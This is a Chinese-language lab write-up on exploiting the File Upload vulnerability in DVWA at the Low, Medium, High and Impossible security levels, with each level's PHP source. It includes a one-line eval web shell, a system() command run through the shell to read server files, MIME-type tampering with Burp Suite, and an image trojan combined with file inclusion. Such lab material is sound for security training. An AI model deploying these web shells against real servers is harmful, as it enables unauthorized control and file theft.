Low
先看看源代碼:
<?php if(isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ],$target_path) ) { // No
$html .= '<pre>Your image was not uploaded.</pre>'; } else { // Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>"; } } ?>
這是最開始的頁面 :
我們嘗試上傳桌面上的一個圖片 :
提示我們成功上傳 : 
這是我們來研究一下這個路徑 :
../../hackable/uploads/1.jpg succesfully uploaded!
這是一個絕對路徑,我們直接輸入網址 :
http://127.0.0.1/DVWA/hackable/uploads/1.jpg
這個時候我們嘗試上傳桌面上的 :1.php文件
寫入內容為 <?php phpinfo();?>
我們發現上傳成功,服務器並未作任何過濾限制:
我們再次訪問上傳的路徑 : http://127.0.0.1/DVWA/hackable/uploads/1.php
這里就說明存在文件上傳漏洞,能夠上傳並且執行php文件
這個時候如果我們上傳一句話木馬 :
<?php @eval($_GET['joker']);?>
並且用中國菜刀進行連接,就可以得到這個服務器的Webshell,初步的控制了這台服務器
我們先進行上傳:
上傳成功后我們來訪問 :
頁面沒有報錯,說明上傳成功
1.這時我們輸入網址 :
http://127.0.0.1/DVWA/hackable/uploads/2.php?joker=system('type D:\\PHP\\wamp\\www\\DVWA\\php.ini');
發現可以成功操作,利用這個我們可以查看服務器下所以文件夾
2.或者打開中國菜刀,並且寫入路經 : http://127.0.0.1/DVWA/hackable/uploads/2.php
選擇鏈接 :
這樣我們就同樣可以訪問這個服務器的任何文件夾,可見,文件上傳漏洞是非常具有危害性的
Medium級:
先看源代碼:
<?php if(isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; // Is it an image?
if(( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) { // Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) )
{ // No
$html .= '<pre>Your image was not uploaded.</pre>'; } else { // Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file
$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } } ?>
看代碼:
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; $uploaded_type == "image/jpeg" || $uploaded_type == "image/png")&&( $uploaded_size<100000 )
這兩句對上傳的文件類型跟文件大小都進行了判斷過濾,估計1.php上傳會被攔截
根據low等級的經驗,我們嘗試上傳1.php:
果然過濾了php文件,錯誤提示只能上傳jpg,png格式的文件
這時我們可以用burpsuite抓包,來查看上傳成功跟失敗的包有哪些不同:
我們先上傳正常的1.jpg ,burpsuite抓到的包為:
然后我們上傳1.php,同時用burpsuite抓一下上傳失敗的包 :
對比來看,只是上傳類型的不同,我們嘗試抓包,更改上傳類型 :
接下來就是LOW等級的老套路,這里不再贅述
High級:
源代碼如下:
<?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; // Is it an image?
if((strtolower($uploaded_ext) == "jpg" || strtolower($uploaded_ext) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&($uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) ) { // Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { // No
$html .= '<pre>Your image was not uploaded.</pre>'; } else { // Yes!
$html .= "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file
$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } } ?>
也就是說,LOW等級跟Middem等級的方法都已經失效
這個時候我們想是不是可以把php偽造成jpg繞過,也就是制作一句話圖片馬
- 使用CMD制作一句話木馬。
- 參數/b指定以二進制格式復制、合並文件; 用於圖像類/聲音類文件
- 參數/a指定以ASCII格式復制、合並文件。用於txt等文檔類文件
- copy 1.jpg/b+1.php 2.jpg
- //意思是將1.jpg以二進制與1.php合並成2.jpg
- 那么2.jpg就是圖片木馬了
圖片馬就做好了 : 
我們用notepad++ 打開可以看見這么一句話 :
然后我們就可上傳了 :
這時我們可以借助php文件解析漏洞,輸入網址 :
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file://D:\PHP\wamp\www\DVWA\hackable\uploads\2.jpg
這樣就可以訪問圖片馬包含的php代碼
接下來就是老套路,不再贅述
Impossible級:
我們先來看代碼:
<?php if( isset( $_POST[ 'Upload' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // File information $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/'; //$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-'; $target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; $temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) ); $temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext; // Is it an image? if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) && ( $uploaded_size < 100000 ) && ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) && getimagesize( $uploaded_tmp ) ) { // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD) if( $uploaded_type == 'image/jpeg' ) { $img = imagecreatefromjpeg( $uploaded_tmp ); imagejpeg( $img, $temp_file, 100); } else { $img = imagecreatefrompng( $uploaded_tmp ); imagepng( $img, $temp_file, 9); } imagedestroy( $img ); // Can we move the file to the web root from the temp folder? if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) { // Yes! $html .= "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>"; } else { // No $html .= '<pre>Your image was not uploaded.</pre>'; } // Delete any temp files if( file_exists( $temp_file ) ) unlink( $temp_file ); } else { // Invalid file $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } } // Generate Anti-CSRF token generateSessionToken(); ?>
我們嘗試上傳一張圖片1.jpg : 
我們上傳的文件名都被重新設計,可想而知,我們的圖片馬已經失效